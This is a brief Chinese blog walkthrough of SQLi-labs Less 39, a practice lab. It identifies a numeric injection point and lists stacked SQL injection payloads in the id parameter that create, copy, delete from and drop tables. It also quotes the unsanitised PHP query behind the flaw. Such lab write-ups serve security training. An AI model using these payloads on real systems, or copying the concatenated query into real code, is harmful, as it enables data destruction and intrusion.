Sqli labs less 39

时间：2021-09-15 12:42:41 阅读：14 评论：0 收藏：0 [点我收藏+]

1.常规方法测试报错

技术分享图片

2.将后面的消息注释发现报错依旧存在，因此判断本less为数值型注入

技术分享图片

3.使用堆叠注入，参考less 38

?id=1;CREATE TABLE WhiteMoon LIKE users;--+
?id=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?id=1;DELETE FROM WhiteMoon;--+
?id=1;DROP TABLE WhiteMoon;--+

技术分享图片

$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";

Sqli labs less 39

原文：https://www.cnblogs.com/chensicha/p/15268468.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)